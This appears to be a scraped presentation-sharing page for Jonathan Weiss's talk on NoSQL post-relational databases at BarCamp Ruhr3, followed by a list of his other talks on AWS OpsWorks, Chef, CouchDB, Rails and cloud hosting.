NoSQL - Post-Relational Databases - BarCamp Ruhr3NoSQL - Post-Relational Databases - BarCamp Ruhr3
NoSQL - Post-Relational Databases - BarCamp Ruhr3Jonathan Weiss
 

Mehr von Jonathan Weiss (20)

Docker on AWS OpsWorks
Docker on AWS OpsWorksDocker on AWS OpsWorks
Docker on AWS OpsWorks
 
ChefConf 2014 - AWS OpsWorks Under The Hood
ChefConf 2014 - AWS OpsWorks Under The HoodChefConf 2014 - AWS OpsWorks Under The Hood
ChefConf 2014 - AWS OpsWorks Under The Hood
 
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014AWS OpsWorks & Chef at the Hamburg Chef User Group 2014
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014
 
DevOpsDays Amsterdam - Observations in the cloud
DevOpsDays Amsterdam - Observations in the cloudDevOpsDays Amsterdam - Observations in the cloud
DevOpsDays Amsterdam - Observations in the cloud
 
Amazon SWF and Gordon
Amazon SWF and GordonAmazon SWF and Gordon
Amazon SWF and Gordon
 
Introduction to Backbone.js
Introduction to Backbone.jsIntroduction to Backbone.js
Introduction to Backbone.js
 
Scalarium and CouchDB
Scalarium and CouchDBScalarium and CouchDB
Scalarium and CouchDB
 
Build your own clouds with Chef and MCollective
Build your own clouds with Chef and MCollectiveBuild your own clouds with Chef and MCollective
Build your own clouds with Chef and MCollective
 
NoSQL - Motivation and Overview
NoSQL - Motivation and OverviewNoSQL - Motivation and Overview
NoSQL - Motivation and Overview
 
NoSQL - An introduction to CouchDB
NoSQL - An introduction to CouchDBNoSQL - An introduction to CouchDB
NoSQL - An introduction to CouchDB
 
Running on Amazon EC2
Running on Amazon EC2Running on Amazon EC2
Running on Amazon EC2
 
Amazon EC2 in der Praxis
Amazon EC2 in der PraxisAmazon EC2 in der Praxis
Amazon EC2 in der Praxis
 
Infrastructure Automation with Chef
Infrastructure Automation with ChefInfrastructure Automation with Chef
Infrastructure Automation with Chef
 
Rails in the Cloud
Rails in the CloudRails in the Cloud
Rails in the Cloud
 
EventMachine
EventMachineEventMachine
EventMachine
 
CouchDB on Rails
CouchDB on RailsCouchDB on Rails
CouchDB on Rails
 
Rails in the Cloud - Experiences from running on EC2
Rails in the Cloud - Experiences from running on EC2Rails in the Cloud - Experiences from running on EC2
Rails in the Cloud - Experiences from running on EC2
 
CouchDB on Rails - RailsWayCon 2010
CouchDB on Rails - RailsWayCon 2010CouchDB on Rails - RailsWayCon 2010
CouchDB on Rails - RailsWayCon 2010
 
CouchDB on Rails - FrozenRails 2010
CouchDB on Rails - FrozenRails 2010CouchDB on Rails - FrozenRails 2010
CouchDB on Rails - FrozenRails 2010
 
NoSQL - Post-Relational Databases - BarCamp Ruhr3
NoSQL - Post-Relational Databases - BarCamp Ruhr3NoSQL - Post-Relational Databases - BarCamp Ruhr3
NoSQL - Post-Relational Databases - BarCamp Ruhr3
 

Web Application Security